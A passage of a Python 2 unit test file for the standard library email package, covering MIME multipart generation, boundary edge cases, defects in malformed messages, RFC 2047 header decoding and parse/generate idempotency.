fp = openfile('PyBanner048.gif')
try:
data = fp.read()
finally:
fp.close()
container = MIMEBase('multipart', 'mixed', boundary='BOUNDARY')
image = MIMEImage(data, name='dingusfish.gif')
image.add_header('content-disposition', 'attachment',
filename='dingusfish.gif')
intro = MIMEText('''\
Hi there,
This is the dingus fish.
''')
container.attach(intro)
container.attach(image)
container['From'] = 'Barry <barry@digicool.com>'
container['To'] = 'Dingus Lovers <cravindogs@cravindogs.com>'
container['Subject'] = 'Here is your dingus fish'
now = 987809702.54848599
timetuple = time.localtime(now)
if timetuple[-1] == 0:
tzsecs = time.timezone
else:
tzsecs = time.altzone
if tzsecs > 0:
sign = '-'
else:
sign = '+'
tzoffset = ' %s%04d' % (sign, tzsecs / 36)
container['Date'] = time.strftime(
'%a, %d %b %Y %H:%M:%S',
time.localtime(now)) + tzoffset
self._msg = container
self._im = image
self._txt = intro
def test_hierarchy(self):
# convenience
eq = self.assertEqual
unless = self.failUnless
raises = self.assertRaises
# tests
m = self._msg
unless(m.is_multipart())
eq(m.get_content_type(), 'multipart/mixed')
eq(len(m.get_payload()), 2)
raises(IndexError, m.get_payload, 2)
m0 = m.get_payload(0)
m1 = m.get_payload(1)
unless(m0 is self._txt)
unless(m1 is self._im)
eq(m.get_payload(), [m0, m1])
unless(not m0.is_multipart())
unless(not m1.is_multipart())
def test_empty_multipart_idempotent(self):
text = """\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
--BOUNDARY--
"""
msg = Parser().parsestr(text)
self.ndiffAssertEqual(text, msg.as_string())
def test_no_parts_in_a_multipart_with_none_epilogue(self):
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = 'aperson@dom.ain'
outer['From'] = 'bperson@dom.ain'
outer.set_boundary('BOUNDARY')
self.ndiffAssertEqual(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
--BOUNDARY--''')
def test_no_parts_in_a_multipart_with_empty_epilogue(self):
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = 'aperson@dom.ain'
outer['From'] = 'bperson@dom.ain'
outer.preamble = ''
outer.epilogue = ''
outer.set_boundary('BOUNDARY')
self.ndiffAssertEqual(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
--BOUNDARY--
''')
def test_one_part_in_a_multipart(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = 'aperson@dom.ain'
outer['From'] = 'bperson@dom.ain'
outer.set_boundary('BOUNDARY')
msg = MIMEText('hello world')
outer.attach(msg)
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--''')
def test_seq_parts_in_a_multipart_with_empty_preamble(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = 'aperson@dom.ain'
outer['From'] = 'bperson@dom.ain'
outer.preamble = ''
msg = MIMEText('hello world')
outer.attach(msg)
outer.set_boundary('BOUNDARY')
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--''')
def test_seq_parts_in_a_multipart_with_none_preamble(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = 'aperson@dom.ain'
outer['From'] = 'bperson@dom.ain'
outer.preamble = None
msg = MIMEText('hello world')
outer.attach(msg)
outer.set_boundary('BOUNDARY')
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--''')
def test_seq_parts_in_a_multipart_with_none_epilogue(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = 'aperson@dom.ain'
outer['From'] = 'bperson@dom.ain'
outer.epilogue = None
msg = MIMEText('hello world')
outer.attach(msg)
outer.set_boundary('BOUNDARY')
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--''')
def test_seq_parts_in_a_multipart_with_empty_epilogue(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = 'aperson@dom.ain'
outer['From'] = 'bperson@dom.ain'
outer.epilogue = ''
msg = MIMEText('hello world')
outer.attach(msg)
outer.set_boundary('BOUNDARY')
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--
''')
def test_seq_parts_in_a_multipart_with_nl_epilogue(self):
eq = self.ndiffAssertEqual
outer = MIMEBase('multipart', 'mixed')
outer['Subject'] = 'A subject'
outer['To'] = 'aperson@dom.ain'
outer['From'] = 'bperson@dom.ain'
outer.epilogue = '\n'
msg = MIMEText('hello world')
outer.attach(msg)
outer.set_boundary('BOUNDARY')
eq(outer.as_string(), '''\
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME-Version: 1.0
Subject: A subject
To: aperson@dom.ain
From: bperson@dom.ain
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
hello world
--BOUNDARY--
''')
def test_message_external_body(self):
eq = self.assertEqual
msg = self._msgobj('msg_36.txt')
eq(len(msg.get_payload()), 2)
msg1 = msg.get_payload(1)
eq(msg1.get_content_type(), 'multipart/alternative')
eq(len(msg1.get_payload()), 2)
for subpart in msg1.get_payload():
eq(subpart.get_content_type(), 'message/external-body')
eq(len(subpart.get_payload()), 1)
subsubpart = subpart.get_payload(0)
eq(subsubpart.get_content_type(), 'text/plain')
def test_double_boundary(self):
# msg_37.txt is a multipart that contains two dash-boundary's in a
# row. Our interpretation of RFC 2046 calls for ignoring the second
# and subsequent boundaries.
msg = self._msgobj('msg_37.txt')
self.assertEqual(len(msg.get_payload()), 3)
def test_nested_inner_contains_outer_boundary(self):
eq = self.ndiffAssertEqual
# msg_38.txt has an inner part that contains outer boundaries. My
# interpretation of RFC 2046 (based on sections 5.1 and 5.1.2) say
# these are illegal and should be interpreted as unterminated inner
# parts.
msg = self._msgobj('msg_38.txt')
sfp = StringIO()
iterators._structure(msg, sfp)
eq(sfp.getvalue(), """\
multipart/mixed
multipart/mixed
multipart/alternative
text/plain
text/plain
text/plain
text/plain
""")
def test_nested_with_same_boundary(self):
eq = self.ndiffAssertEqual
# msg 39.txt is similarly evil in that it's got inner parts that use
# the same boundary as outer parts. Again, I believe the way this is
# parsed is closest to the spirit of RFC 2046
msg = self._msgobj('msg_39.txt')
sfp = StringIO()
iterators._structure(msg, sfp)
eq(sfp.getvalue(), """\
multipart/mixed
multipart/mixed
multipart/alternative
application/octet-stream
application/octet-stream
text/plain
""")
def test_boundary_in_non_multipart(self):
msg = self._msgobj('msg_40.txt')
self.assertEqual(msg.as_string(), '''\
MIME-Version: 1.0
Content-Type: text/html; boundary="--961284236552522269"
----961284236552522269
Content-Type: text/html;
Content-Transfer-Encoding: 7Bit
<html></html>
----961284236552522269--
''')
def test_boundary_with_leading_space(self):
eq = self.assertEqual
msg = email.message_from_string('''\
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary=" XXXX"
-- XXXX
Content-Type: text/plain
-- XXXX
Content-Type: text/plain
-- XXXX--
''')
self.failUnless(msg.is_multipart())
eq(msg.get_boundary(), ' XXXX')
eq(len(msg.get_payload()), 2)
def test_boundary_without_trailing_newline(self):
m = Parser().parsestr("""\
Content-Type: multipart/mixed; boundary="===============0012394164=="
MIME-Version: 1.0
--===============0012394164==
Content-Type: image/file1.jpg
MIME-Version: 1.0
Content-Transfer-Encoding: base64
YXNkZg==
--===============0012394164==--""")
self.assertEquals(m.get_payload(0).get_payload(), 'YXNkZg==')
# Test some badly formatted messages
class TestNonConformant(TestEmailBase):
def test_parse_missing_minor_type(self):
eq = self.assertEqual
msg = self._msgobj('msg_14.txt')
eq(msg.get_content_type(), 'text/plain')
eq(msg.get_content_maintype(), 'text')
eq(msg.get_content_subtype(), 'plain')
def test_same_boundary_inner_outer(self):
unless = self.failUnless
msg = self._msgobj('msg_15.txt')
# XXX We can probably eventually do better
inner = msg.get_payload(0)
unless(hasattr(inner, 'defects'))
self.assertEqual(len(inner.defects), 1)
unless(isinstance(inner.defects[0],
errors.StartBoundaryNotFoundDefect))
def test_multipart_no_boundary(self):
unless = self.failUnless
msg = self._msgobj('msg_25.txt')
unless(isinstance(msg.get_payload(), str))
self.assertEqual(len(msg.defects), 2)
unless(isinstance(msg.defects[0], errors.NoBoundaryInMultipartDefect))
unless(isinstance(msg.defects[1],
errors.MultipartInvariantViolationDefect))
def test_invalid_content_type(self):
eq = self.assertEqual
neq = self.ndiffAssertEqual
msg = Message()
# RFC 2045, $5.2 says invalid yields text/plain
msg['Content-Type'] = 'text'
eq(msg.get_content_maintype(), 'text')
eq(msg.get_content_subtype(), 'plain')
eq(msg.get_content_type(), 'text/plain')
# Clear the old value and try something /really/ invalid
del msg['content-type']
msg['Content-Type'] = 'foo'
eq(msg.get_content_maintype(), 'text')
eq(msg.get_content_subtype(), 'plain')
eq(msg.get_content_type(), 'text/plain')
# Still, make sure that the message is idempotently generated
s = StringIO()
g = Generator(s)
g.flatten(msg)
neq(s.getvalue(), 'Content-Type: foo\n\n')
def test_no_start_boundary(self):
eq = self.ndiffAssertEqual
msg = self._msgobj('msg_31.txt')
eq(msg.get_payload(), """\
--BOUNDARY
Content-Type: text/plain
message 1
--BOUNDARY
Content-Type: text/plain
message 2
--BOUNDARY--
""")
def test_no_separating_blank_line(self):
eq = self.ndiffAssertEqual
msg = self._msgobj('msg_35.txt')
eq(msg.as_string(), """\
From: aperson@dom.ain
To: bperson@dom.ain
Subject: here's something interesting
counter to RFC 2822, there's no separating newline here
""")
def test_lying_multipart(self):
unless = self.failUnless
msg = self._msgobj('msg_41.txt')
unless(hasattr(msg, 'defects'))
self.assertEqual(len(msg.defects), 2)
unless(isinstance(msg.defects[0], errors.NoBoundaryInMultipartDefect))
unless(isinstance(msg.defects[1],
errors.MultipartInvariantViolationDefect))
def test_missing_start_boundary(self):
outer = self._msgobj('msg_42.txt')
# The message structure is:
#
# multipart/mixed
# text/plain
# message/rfc822
# multipart/mixed [*]
#
# [*] This message is missing its start boundary
bad = outer.get_payload(1).get_payload(0)
self.assertEqual(len(bad.defects), 1)
self.failUnless(isinstance(bad.defects[0],
errors.StartBoundaryNotFoundDefect))
def test_first_line_is_continuation_header(self):
eq = self.assertEqual
m = ' Line 1\nLine 2\nLine 3'
msg = email.message_from_string(m)
eq(msg.keys(), [])
eq(msg.get_payload(), 'Line 2\nLine 3')
eq(len(msg.defects), 1)
self.failUnless(isinstance(msg.defects[0],
errors.FirstHeaderLineIsContinuationDefect))
eq(msg.defects[0].line, ' Line 1\n')
# Test RFC 2047 header encoding and decoding
class TestRFC2047(unittest.TestCase):
def test_rfc2047_multiline(self):
eq = self.assertEqual
s = """Re: =?mac-iceland?q?r=8Aksm=9Arg=8Cs?= baz
foo bar =?mac-iceland?q?r=8Aksm=9Arg=8Cs?="""
dh = decode_header(s)
eq(dh, [
('Re:', None),
('r\x8aksm\x9arg\x8cs', 'mac-iceland'),
('baz foo bar', None),
('r\x8aksm\x9arg\x8cs', 'mac-iceland')])
eq(str(make_header(dh)),
"""Re: =?mac-iceland?q?r=8Aksm=9Arg=8Cs?= baz foo bar
=?mac-iceland?q?r=8Aksm=9Arg=8Cs?=""")
def test_whitespace_eater_unicode(self):
eq = self.assertEqual
s = '=?ISO-8859-1?Q?Andr=E9?= Pirard <pirard@dom.ain>'
dh = decode_header(s)
eq(dh, [('Andr\xe9', 'iso-8859-1'), ('Pirard <pirard@dom.ain>', None)])
hu = unicode(make_header(dh)).encode('latin-1')
eq(hu, 'Andr\xe9 Pirard <pirard@dom.ain>')
def test_whitespace_eater_unicode_2(self):
eq = self.assertEqual
s = 'The =?iso-8859-1?b?cXVpY2sgYnJvd24gZm94?= jumped over the =?iso-8859-1?b?bGF6eSBkb2c=?='
dh = decode_header(s)
eq(dh, [('The', None), ('quick brown fox', 'iso-8859-1'),
('jumped over the', None), ('lazy dog', 'iso-8859-1')])
hu = make_header(dh).__unicode__()
eq(hu, u'The quick brown fox jumped over the lazy dog')
def test_rfc2047_missing_whitespace(self):
s = 'Sm=?ISO-8859-1?B?9g==?=rg=?ISO-8859-1?B?5Q==?=sbord'
dh = decode_header(s)
self.assertEqual(dh, [(s, None)])
def test_rfc2047_with_whitespace(self):
s = 'Sm =?ISO-8859-1?B?9g==?= rg =?ISO-8859-1?B?5Q==?= sbord'
dh = decode_header(s)
self.assertEqual(dh, [('Sm', None), ('\xf6', 'iso-8859-1'),
('rg', None), ('\xe5', 'iso-8859-1'),
('sbord', None)])
# Test the MIMEMessage class
class TestMIMEMessage(TestEmailBase):
def setUp(self):
fp = openfile('msg_11.txt')
try:
self._text = fp.read()
finally:
fp.close()
def test_type_error(self):
self.assertRaises(TypeError, MIMEMessage, 'a plain string')
def test_valid_argument(self):
eq = self.assertEqual
unless = self.failUnless
subject = 'A sub-message'
m = Message()
m['Subject'] = subject
r = MIMEMessage(m)
eq(r.get_content_type(), 'message/rfc822')
payload = r.get_payload()
unless(isinstance(payload, list))
eq(len(payload), 1)
subpart = payload[0]
unless(subpart is m)
eq(subpart['subject'], subject)
def test_bad_multipart(self):
eq = self.assertEqual
msg1 = Message()
msg1['Subject'] = 'subpart 1'
msg2 = Message()
msg2['Subject'] = 'subpart 2'
r = MIMEMessage(msg1)
self.assertRaises(errors.MultipartConversionError, r.attach, msg2)
def test_generate(self):
# First craft the message to be encapsulated
m = Message()
m['Subject'] = 'An enclosed message'
m.set_payload('Here is the body of the message.\n')
r = MIMEMessage(m)
r['Subject'] = 'The enclosing message'
s = StringIO()
g = Generator(s)
g.flatten(r)
self.assertEqual(s.getvalue(), """\
Content-Type: message/rfc822
MIME-Version: 1.0
Subject: The enclosing message
Subject: An enclosed message
Here is the body of the message.
""")
def test_parse_message_rfc822(self):
eq = self.assertEqual
unless = self.failUnless
msg = self._msgobj('msg_11.txt')
eq(msg.get_content_type(), 'message/rfc822')
payload = msg.get_payload()
unless(isinstance(payload, list))
eq(len(payload), 1)
submsg = payload[0]
self.failUnless(isinstance(submsg, Message))
eq(submsg['subject'], 'An enclosed message')
eq(submsg.get_payload(), 'Here is the body of the message.\n')
def test_dsn(self):
eq = self.assertEqual
unless = self.failUnless
# msg 16 is a Delivery Status Notification, see RFC 1894
msg = self._msgobj('msg_16.txt')
eq(msg.get_content_type(), 'multipart/report')
unless(msg.is_multipart())
eq(len(msg.get_payload()), 3)
# Subpart 1 is a text/plain, human readable section
subpart = msg.get_payload(0)
eq(subpart.get_content_type(), 'text/plain')
eq(subpart.get_payload(), """\
This report relates to a message you sent with the following header fields:
Message-id: <002001c144a6$8752e060$56104586@oxy.edu>
Date: Sun, 23 Sep 2001 20:10:55 -0700
From: "Ian T. Henry" <henryi@oxy.edu>
To: SoCal Raves <scr@socal-raves.org>
Subject: [scr] yeah for Ians!!
Your message cannot be delivered to the following recipients:
Recipient address: jangel1@cougar.noc.ucla.edu
Reason: recipient reached disk quota
""")
# Subpart 2 contains the machine parsable DSN information. It
# consists of two blocks of headers, represented by two nested Message
# objects.
subpart = msg.get_payload(1)
eq(subpart.get_content_type(), 'message/delivery-status')
eq(len(subpart.get_payload()), 2)
# message/delivery-status should treat each block as a bunch of
# headers, i.e. a bunch of Message objects.
dsn1 = subpart.get_payload(0)
unless(isinstance(dsn1, Message))
eq(dsn1['original-envelope-id'], '0GK500B4HD0888@cougar.noc.ucla.edu')
eq(dsn1.get_param('dns', header='reporting-mta'), '')
# Try a missing one <wink>
eq(dsn1.get_param('nsd', header='reporting-mta'), None)
dsn2 = subpart.get_payload(1)
unless(isinstance(dsn2, Message))
eq(dsn2['action'], 'failed')
eq(dsn2.get_params(header='original-recipient'),
[('rfc822', ''), ('jangel1@cougar.noc.ucla.edu', '')])
eq(dsn2.get_param('rfc822', header='final-recipient'), '')
# Subpart 3 is the original message
subpart = msg.get_payload(2)
eq(subpart.get_content_type(), 'message/rfc822')
payload = subpart.get_payload()
unless(isinstance(payload, list))
eq(len(payload), 1)
subsubpart = payload[0]
unless(isinstance(subsubpart, Message))
eq(subsubpart.get_content_type(), 'text/plain')
eq(subsubpart['message-id'],
'<002001c144a6$8752e060$56104586@oxy.edu>')
def test_epilogue(self):
eq = self.ndiffAssertEqual
fp = openfile('msg_21.txt')
try:
text = fp.read()
finally:
fp.close()
msg = Message()
msg['From'] = 'aperson@dom.ain'
msg['To'] = 'bperson@dom.ain'
msg['Subject'] = 'Test'
msg.preamble = 'MIME message'
msg.epilogue = 'End of MIME message\n'
msg1 = MIMEText('One')
msg2 = MIMEText('Two')
msg.add_header('Content-Type', 'multipart/mixed', boundary='BOUNDARY')
msg.attach(msg1)
msg.attach(msg2)
sfp = StringIO()
g = Generator(sfp)
g.flatten(msg)
eq(sfp.getvalue(), text)
def test_no_nl_preamble(self):
eq = self.ndiffAssertEqual
msg = Message()
msg['From'] = 'aperson@dom.ain'
msg['To'] = 'bperson@dom.ain'
msg['Subject'] = 'Test'
msg.preamble = 'MIME message'
msg.epilogue = ''
msg1 = MIMEText('One')
msg2 = MIMEText('Two')
msg.add_header('Content-Type', 'multipart/mixed', boundary='BOUNDARY')
msg.attach(msg1)
msg.attach(msg2)
eq(msg.as_string(), """\
From: aperson@dom.ain
To: bperson@dom.ain
Subject: Test
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME message
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
One
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Two
--BOUNDARY--
""")
def test_default_type(self):
eq = self.assertEqual
fp = openfile('msg_30.txt')
try:
msg = email.message_from_file(fp)
finally:
fp.close()
container1 = msg.get_payload(0)
eq(container1.get_default_type(), 'message/rfc822')
eq(container1.get_content_type(), 'message/rfc822')
container2 = msg.get_payload(1)
eq(container2.get_default_type(), 'message/rfc822')
eq(container2.get_content_type(), 'message/rfc822')
container1a = container1.get_payload(0)
eq(container1a.get_default_type(), 'text/plain')
eq(container1a.get_content_type(), 'text/plain')
container2a = container2.get_payload(0)
eq(container2a.get_default_type(), 'text/plain')
eq(container2a.get_content_type(), 'text/plain')
def test_default_type_with_explicit_container_type(self):
eq = self.assertEqual
fp = openfile('msg_28.txt')
try:
msg = email.message_from_file(fp)
finally:
fp.close()
container1 = msg.get_payload(0)
eq(container1.get_default_type(), 'message/rfc822')
eq(container1.get_content_type(), 'message/rfc822')
container2 = msg.get_payload(1)
eq(container2.get_default_type(), 'message/rfc822')
eq(container2.get_content_type(), 'message/rfc822')
container1a = container1.get_payload(0)
eq(container1a.get_default_type(), 'text/plain')
eq(container1a.get_content_type(), 'text/plain')
container2a = container2.get_payload(0)
eq(container2a.get_default_type(), 'text/plain')
eq(container2a.get_content_type(), 'text/plain')
def test_default_type_non_parsed(self):
eq = self.assertEqual
neq = self.ndiffAssertEqual
# Set up container
container = MIMEMultipart('digest', 'BOUNDARY')
container.epilogue = ''
# Set up subparts
subpart1a = MIMEText('message 1\n')
subpart2a = MIMEText('message 2\n')
subpart1 = MIMEMessage(subpart1a)
subpart2 = MIMEMessage(subpart2a)
container.attach(subpart1)
container.attach(subpart2)
eq(subpart1.get_content_type(), 'message/rfc822')
eq(subpart1.get_default_type(), 'message/rfc822')
eq(subpart2.get_content_type(), 'message/rfc822')
eq(subpart2.get_default_type(), 'message/rfc822')
neq(container.as_string(0), '''\
Content-Type: multipart/digest; boundary="BOUNDARY"
MIME-Version: 1.0
--BOUNDARY
Content-Type: message/rfc822
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
message 1
--BOUNDARY
Content-Type: message/rfc822
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
message 2
--BOUNDARY--
''')
del subpart1['content-type']
del subpart1['mime-version']
del subpart2['content-type']
del subpart2['mime-version']
eq(subpart1.get_content_type(), 'message/rfc822')
eq(subpart1.get_default_type(), 'message/rfc822')
eq(subpart2.get_content_type(), 'message/rfc822')
eq(subpart2.get_default_type(), 'message/rfc822')
neq(container.as_string(0), '''\
Content-Type: multipart/digest; boundary="BOUNDARY"
MIME-Version: 1.0
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
message 1
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
message 2
--BOUNDARY--
''')
def test_mime_attachments_in_constructor(self):
eq = self.assertEqual
text1 = MIMEText('')
text2 = MIMEText('')
msg = MIMEMultipart(_subparts=(text1, text2))
eq(len(msg.get_payload()), 2)
eq(msg.get_payload(0), text1)
eq(msg.get_payload(1), text2)
# A general test of parser->model->generator idempotency. IOW, read a message
# in, parse it into a message object tree, then without touching the tree,
# regenerate the plain text. The original text and the transformed text
# should be identical. Note: that we ignore the Unix-From since that may
# contain a changed date.
class TestIdempotent(TestEmailBase):
def _msgobj(self, filename):
fp = openfile(filename)
try:
data = fp.read()
finally:
fp.close()
msg = email.message_from_string(data)
return msg, data
def _idempotent(self, msg, text):
eq = self.ndiffAssertEqual
s = StringIO()
g = Generator(s, maxheaderlen=0)
g.flatten(msg)
eq(text, s.getvalue())
def test_parse_text_message(self):
eq = self.assertEquals
msg, text = self._msgobj('msg_01.txt')
eq(msg.get_content_type(), 'text/plain')
eq(msg.get_content_maintype(), 'text')
eq(msg.get_content_subtype(), 'plain')
eq(msg.get_params()[1], ('charset', 'us-ascii'))
eq(msg.get_param('charset'), 'us-ascii')
eq(msg.preamble, None)
eq(msg.epilogue, None)
self._idempotent(msg, text)
def test_parse_untyped_message(self):
eq = self.assertEquals
msg, text = self._msgobj('msg_03.txt')
eq(msg.get_content_type(), 'text/plain')
eq(msg.get_params(), None)
eq(msg.get_param('charset'), None)
self._idempotent(msg, text)
def test_simple_multipart(self):
msg, text = self._msgobj('msg_04.txt')
self._idempotent(msg, text)
def test_MIME_digest(self):
msg, text = self._msgobj('msg_02.txt')
self._idempotent(msg, text)
def test_long_header(self):
msg, text = self._msgobj('msg_27.txt')
self._idempotent(msg, text)
def test_MIME_digest_with_part_headers(self):
msg, text = self._msgobj('msg_28.txt')
self._idempotent(msg, text)
def test_mixed_with_image(self):
msg, text = self._msgobj('msg_06.txt')
self._idempotent(msg, text)
def test_multipart_report(self):
msg, text = self._msgobj('msg_05.txt')
self._idempotent(msg, text)
def test_dsn(self):
msg, text = self._msgobj('msg_16.txt')
self._idempotent(msg, text)
def test_preamble_epilogue(self):
msg, text = self._msgobj('msg_21.txt')
self._idempotent(msg, text)
def test_multipart_one_part(self):
msg, text = self._msgobj('msg_23.txt')
self._idempotent(msg, text)
def test_multipart_no_parts(self):
msg, text = self._msgobj('msg_24.txt')
self._idempotent(msg, text)
def test_no_start_boundary(self):
msg, text = self._msgobj('msg_31.txt')
self._idempotent(msg, text)
def test_rfc2231_charset(self):
msg, text = self._msgobj('msg_32.txt')
self._idempotent(msg, text)
def test_more_rfc2231_parameters(self):
msg, text = self._msgobj('msg_33.txt')
self._idempotent(msg, text)
def test_text_plain_in_a_multipart_digest(self):
msg, text = self._msgobj('msg_34.txt')
self._idempotent(msg, text)
def test_nested_multipart_mixeds(self):
msg, text = self._msgobj('msg_12a.txt')
self._idempotent(msg, text)
def test_message_external_body_idempotent(self):
msg, text = self._msgobj('msg_36.txt')
self._idempotent(msg, text)
def test_content_type(self):
eq = self.assertEquals
unless = self.failUnless
# Get a message object and reset the seek pointer for other tests
msg, text = self._msgobj('msg_05.txt')
eq(msg.get_content_type(), 'multipart/report')
# Test the Content-Type: parameters
params = {}
for pk, pv in msg.get_params():
params[pk] = pv
eq(params['report-type'], 'delivery-status')
eq(params['boundary'], 'D1690A7AC1.996856090/mail.example.com')
eq(msg.preamble, 'This is a MIME-encapsulated message.\n')
eq(msg.epilogue, '\n')
eq(len(msg.get_payload()), 3)
# Make sure the subparts are what we expect
msg1 = msg.get_payload(0)
eq(msg1.get_content_type(), 'text/plain')
eq(msg1.get_payload(), 'Yadda yadda yadda\n')
msg2 = msg.get_payload(1)
eq(msg2.get_content_type(), 'text/plain')
eq(msg2.get_payload(), 'Yadda yadda yadda\n')
msg3 = msg.get_payload(2)
eq(msg3.get_content_type(), 'message/rfc822')
self.failUnless(isinstance(msg3, Message))
payload = msg3.get_payload()
unless(isinstance(payload, list))
eq(len(payload), 1)
msg4 = payload[0]
unless(isinstance(msg4, Message))
eq(msg4.get_payload(), 'Yadda yadda yadda\n')
def test_parser(self):
eq = self.assertEquals
unless = self.failUnless
msg, text = self._msgobj('msg_06.txt')
# Check some of the outer headers
eq(msg.get_content_type(), 'message/rfc822')
# Make sure the payload is a list of exactly one sub-Message, and that
# that submessage has a type of text/plain
payload = msg.get_payload()
unless(isinstance(payload, list))
eq(len(payload), 1)
msg1 = payload[0]
self.failUnless(isinstance(msg1, Message))
eq(msg1.get_content_type(), 'text/plain')
self.failUnless(isinstance(msg1.get_payload(), str))
eq(msg1.get_payload(), '\n')
# Test various other bits of the package's functionality
class TestMiscellaneous(TestEmailBase):
def test_message_from_string(self):
fp = openfile('msg_01.txt')
try:
text = fp.read()
finally:
fp.close()
msg = email.message_from_string(text)
s = StringIO()
# Don't wrap/continue long headers since we're trying to test
# idempotency.
g = Generator(s, maxheaderlen=0)
g.flatten(msg)
self.assertEqual(text, s.getvalue())
def test_message_from_file(self):
fp = openfile('msg_01.txt')
try:
text = fp.read()
fp.seek(0)
msg = email.message_from_file(fp)
s = StringIO()
# Don't wrap/continue long headers since we're trying to test
# idempotency.
g = Generator(s, maxheaderlen=0)
g.flatten(msg)
self.assertEqual(text, s.getvalue())
finally:
fp.close()
def test_message_from_string_with_class(self):
unless = self.failUnless
fp = openfile('msg_01.txt')
try:
text = fp.read()
finally:
fp.close()
# Create a subclass
class MyMessage(Message):
pass
msg = email.message_from_string(text, MyMessage)
unless(isinstance(msg, MyMessage))
# Try something more complicated
fp = openfile('msg_02.txt')
try:
text = fp.read()
finally:
fp.close()
msg = email.message_from_string(text, MyMessage)
for subpart in msg.walk():
unless(isinstance(subpart, MyMessage))
def test_message_from_file_with_class(self):
unless = self.failUnless
# Create a subclass
class MyMessage(Message):
pass
fp = openfile('msg_01.txt')
try:
msg = email.message_from_file(fp, MyMessage)
finally:
fp.close()
unless(isinstance(msg, MyMessage))
# Try something more complicated
fp = openfile('msg_02.txt')
try:
msg = email.message_from_file(fp, MyMessage)
finally:
fp.close()
for subpart in msg.walk():
unless(isinstance(subpart, MyMessage))
def test__all__(self):
module = __import__('email')
# Can't use sorted() here due to Python 2.3 compatibility
all = module.__all__[:]
all.sort()
self.assertEqual(all, [
# Old names
'Charset', 'Encoders', 'Errors', 'Generator',
'Header', 'Iterators', 'MIMEAudio', 'MIMEBase',
'MIMEImage', 'MIMEMessage', 'MIMEMultipart',
'MIMENonMultipart', 'MIMEText', 'Message',
'Parser', 'Utils', 'base64MIME',
# new names
'base64mime', 'charset', 'encoders', 'errors', 'generator',
'header', 'iterators', 'message', 'message_from_file',
'message_from_string', 'mime', 'parser',
'quopriMIME', 'quoprimime', 'utils',
])
def test_formatdate(self):
now = time.time()
self.assertEqual(utils.parsedate(utils.formatdate(now))[:6],
time.gmtime(now)[:6])
def test_formatdate_localtime(self):
now = time.time()
self.assertEqual(
utils.parsedate(utils.formatdate(now, localtime=True))[:6],
time.localtime(now)[:6])
def test_formatdate_usegmt(self):
now = time.time()
self.assertEqual(
utils.formatdate(now, localtime=False),
time.strftime('%a, %d %b %Y %H:%M:%S -0000', time.gmtime(now)))
self.assertEqual(
utils.formatdate(now, localtime=False, usegmt=True),
time.strftime('%a, %d %b %Y %H:%M:%S GMT', time.gmtime(now)))
def test_parsedate_none(self):
self.assertEqual(utils.parsedate(''), None)
def test_parsedate_compact(self):
# The FWS after the comma is optional
self.assertEqual(utils.parsedate('Wed,3 Apr 2002 14:58:26 +0800'),
utils.parsedate('Wed, 3 Apr 2002 14:58:26 +0800'))
